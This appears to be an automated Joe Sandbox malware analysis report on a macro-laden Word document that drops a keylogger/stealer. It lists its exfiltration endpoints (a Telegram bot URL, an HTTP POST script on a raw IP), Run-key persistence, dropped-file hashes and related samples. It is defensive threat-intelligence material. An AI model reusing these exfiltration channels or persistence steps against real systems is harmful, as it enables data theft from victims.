                                                                                                    http://ocsp.sectigo.com0Cbrightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20ajphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedjphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.pmail.com0brightness.exe, 00000007.00000003.2123550803.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161107303.0000000021426000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2161329052.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163281507.0000000021700000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2128046542.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2162496281.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.7.drfalse
                                                                                                            high
                                                                                                            https://reallyfreegeoip.org/xml/jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021170000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C221000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
166.62.27.188 | amazonenviro.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
208.91.198.176 | mail.techniqueqatar.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
147.124.216.113 | unknown | United States | 1432 | AC-AS-1US | false
                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1584675
                                                                                                              Start date and time:2025-01-06 07:53:07 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 11m 33s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:21
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • GSI enabled (VBA)
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:ITT # KRPBV2663 .doc
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.expl.evad.winDOC@24/10@5/6
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 98%
                                                                                                              • Number of executed functions: 148
                                                                                                              • Number of non-executed functions: 120
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .doc
                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                              • Attach to Office via COM
                                                                                                              • Scroll down
                                                                                                              • Close Viewer
                                                                                                              • Override analysis time to 79249.1381 for current running targets taking high CPU consumption
                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 23.56.254.164, 20.50.201.204, 52.111.231.25, 52.111.231.23, 52.111.231.26, 52.111.231.24, 2.21.65.149, 2.21.65.130, 52.109.89.19, 23.200.88.61, 23.200.88.73, 88.221.110.227, 88.221.110.138, 40.126.31.73, 20.109.210.53, 23.1.237.91, 13.107.246.45
                                                                                                              • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.n
                                                                                                              • Not all processes were analyzed, report is missing behavior information
                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              Time | Type | Description
                                                                                                              01:54:03 | API Interceptor | 2x Sleep call for process: brightness.exe modified
                                                                                                              01:54:13 | API Interceptor | 2378888x Sleep call for process: jphwmyiA.pif modified
                                                                                                              01:54:18 | API Interceptor | 4x Sleep call for process: Aiymwhpj.PIF modified
                                                                                                              07:54:09 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Aiymwhpj C:\Users\Public\Aiymwhpj.url
                                                                                                              07:54:17 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Aiymwhpj C:\Users\Public\Aiymwhpj.url
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      adguardInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ePI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ny9LDJr6pA.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      jaTDEkWCbs.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      C:\Users\Public\Libraries\jphwmyiA.pifPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                          HSBC_PAY.SCR.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                  Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                    Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                      RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Aiymwhpj.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):104
                                                                                                                                          Entropy (8bit):5.224478603849098
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM667ysbxRn:HRYFVmTWDyzv6OExRn
                                                                                                                                          MD5:79AC659ACFEF37B78BB99148F2AC4411
                                                                                                                                          SHA1:A1E40AD9CDBAA0045BAE5B735F17A7696A8A0573
                                                                                                                                          SHA-256:E15C4E5C35CA402FEC6714794F894B2B8C6D65B900F19346C56122DAB721A2AF
                                                                                                                                          SHA-512:6D3D00B91DAA741B7C1E895C85F6CF8912628C3189CF0BFA35F10508AD7D6C0FEF645B8928938BCC669B076C4F7A6575D24224C649F50F124D2AACB9DB96A6A9
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Aiymwhpj.PIF"..IconIndex=923753..HotKey=90..
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):15789
                                                                                                                                          Entropy (8bit):4.658965888116939
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                                                          MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                                                          SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                                                          SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                                                          SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):587483
                                                                                                                                          Entropy (8bit):7.97941698770942
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:+cZzMs7baCyZxlymn17OtgtNXR1Fye2D69AEhIKb4u/k:+cpBbR+lyG17mgtNPae9XIA/k
                                                                                                                                          MD5:CBCC38C75EFFD12EDFBFE3A42776952D
                                                                                                                                          SHA1:15888D1A926BE2E5169CCF5B2C6C44149EA478A7
                                                                                                                                          SHA-256:43B4EDAED35A38B6304187C67BE1BEDA3F18769CDB06902BCFFB7BE597AC72A5
                                                                                                                                          SHA-512:7A45405A506D59FF89056388809C7EF11F09A2C04661DEE3C6E8C0F82E7C1E230F77B98D4CCC9F3996173ED848C38FC8379337313D4A13CCD1E76CAE4D2696C7
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1161216
                                                                                                                                          Entropy (8bit):7.246990828069092
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                                                                                                                                          MD5:6047499517804F1EA76B508CA469DE99
                                                                                                                                          SHA1:BA5E8A683C8B8B54A14984D86715040D00777F11
                                                                                                                                          SHA-256:03B17E6FE6CE874C0CF78B2E560F5FB4106E07CE33799632B2E1BBF24E9FB371
                                                                                                                                          SHA-512:A617FD0131D75361D20423B0BC77B6EE65FE071FECF8A9FAB7EA42BE7F9716113468AF15369981F7F652A39F6AA7A77250E2E02783549DA2FCBC54D93821A76F
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8556
                                                                                                                                          Entropy (8bit):4.623706637784657
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                                                          MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                                                          SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                                                          SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                                                          SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):46543
                                                                                                                                          Entropy (8bit):4.705001079878445
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                                                          MD5:637A66953F03B084808934ED7DF7192F
                                                                                                                                          SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                                                          SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                                                          SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):175800
                                                                                                                                          Entropy (8bit):6.631791793070417
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                                          MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                                          SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                                          SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                                 • Filename: PI ITS15235.doc, Detection: malicious
                                                                                                                                                 • Filename: PO#5_Tower_049.bat, Detection: malicious
                                                                                                                                                 • Filename: HSBC_PAY.SCR.exe, Detection: malicious
                                                                                                                                                 • Filename: PO_B2W984.com, Detection: malicious
                                                                                                                                                 • Filename: image.exe, Detection: malicious
                                                                                                                                                 • Filename: PO_KB#67897.cmd, Detection: malicious
                                                                                                                                                 • Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious
                                                                                                                                                 • Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious
                                                                                                                                                 • Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious
                                                                                                                                                 • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):162
                                                                                                                                          Entropy (8bit):2.8584355907719186
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:klt+lll9OQs/RFu/t/HlNc9+RT5t:7tfs/RFuF/0wRFt
                                                                                                                                          MD5:55EFF8AE525CB6216C40FF246F8A2232
                                                                                                                                          SHA1:D14E7C499B084C53E99AA268239C43071F1A0602
                                                                                                                                          SHA-256:18574D1DEF50BD820D257F36C330FE8912FFAE51D64D38EFEC561656876A14FB
                                                                                                                                          SHA-512:870C2C54C418D6B56E91FECC280FBCE11B77F931A29FB52E700475DAD281912C10D719150B0E236C193478B216165DFA86092D41C5C5EFFB717E2451BE8186B2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.user.................................................a.l.f.o.n.s............`.c.........a.i........4F...................................`.c4"/.}..i....@....=.i
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1161216
                                                                                                                                          Entropy (8bit):7.246990828069092
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                                                                                                                                          MD5:6047499517804F1EA76B508CA469DE99
                                                                                                                                          SHA1:BA5E8A683C8B8B54A14984D86715040D00777F11
                                                                                                                                          SHA-256:03B17E6FE6CE874C0CF78B2E560F5FB4106E07CE33799632B2E1BBF24E9FB371
                                                                                                                                          SHA-512:A617FD0131D75361D20423B0BC77B6EE65FE071FECF8A9FAB7EA42BE7F9716113468AF15369981F7F652A39F6AA7A77250E2E02783549DA2FCBC54D93821A76F
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................P..n&... ...........................|..................................................TW...............................text............................... ..`.itext..H........................... ..`.data...@........ ..................@....bss.....6...............................idata..n&...P...(..................@....tls....4................................rdata..............................@..@.reloc...|.......~..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................
                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Nadine Daniel, Template: Normal.dotm, Last Saved By: GRACE, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sun Jan 5 21:34:00 2025, Last Saved Time/Date: Sun Jan 5 21:34:00 2025, Number of Pages: 1, Number of Words: 348, Number of Characters: 1985, Security: 0
                                                                                                                                          Entropy (8bit):4.315631656351978
                                                                                                                                          TrID:
                                                                                                                                          • Microsoft Word document (32009/1) 54.23%
                                                                                                                                          • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                                                          File name:ITT # KRPBV2663 .doc
                                                                                                                                          File size:52'736 bytes
                                                                                                                                          MD5:754c08a32cbfe16e0982b5b56835e247
                                                                                                                                          SHA1:7338cada263faae3d79631efa1c895bf690a4eb3
                                                                                                                                          SHA256:d9980559077d0cf6e251608efa44277ac5cd2b64236ecc31b352a93992e2f2b7
                                                                                                                                          SHA512:6cc3a3a351b58cb5763a745b07a492aaf944e1526a49c3f6da7135e6295a701e7f526c052fcf4961af7a08756f51226f5fbecb4e242d8fdde0f61fa1717772e1
                                                                                                                                          SSDEEP:384:Zp0xfMJvBv2xv8R89JMjN6m4iKpIEOqY+tKiSsqdg1vA9tzt/Mi+P0jN4pfZt8Fs:ZkUJJU6wVoJ+1o9t1MRi4pQmv+SWw
                                                                                                                                          TLSH:E8333121B2C2CE2BE0264875C989C7747725FDABAE95460735C97F1F7C3EA209A43B50
                                                                                                                                          File Content Preview:........................>.......................O...........R...............N..................................................................................................................................................................................
                                                                                                                                          Icon Hash:35e1cc889a8a8599
                                                                                                                                          Document Type:OLE
                                                                                                                                          Number of OLE Files:1
                                                                                                                                          Has Summary Info:
                                                                                                                                          Application Name:Microsoft Office Word
                                                                                                                                          Encrypted Document:False
                                                                                                                                          Contains Word Document Stream:True
                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                          Contains ObjectPool Stream:False
                                                                                                                                          Flash Objects Count:0
                                                                                                                                          Contains VBA Macros:True
                                                                                                                                          Code Page:1252
                                                                                                                                          Title:
                                                                                                                                          Subject:
                                                                                                                                          Author:Nadine Daniel
                                                                                                                                          Keywords:
                                                                                                                                          Comments:
                                                                                                                                          Template:Normal.dotm
                                                                                                                                          Last Saved By:GRACE
                                                                                                                                                 Revision Number:2
                                                                                                                                          Total Edit Time:0
                                                                                                                                          Create Time:2025-01-05 21:34:00
                                                                                                                                          Last Saved Time:2025-01-05 21:34:00
                                                                                                                                          Number of Pages:1
                                                                                                                                          Number of Words:348
                                                                                                                                          Number of Characters:1985
                                                                                                                                          Creating Application:Microsoft Office Word
                                                                                                                                          Security:0
                                                                                                                                          Document Code Page:1252
                                                                                                                                          Number of Lines:16
                                                                                                                                          Number of Paragraphs:4
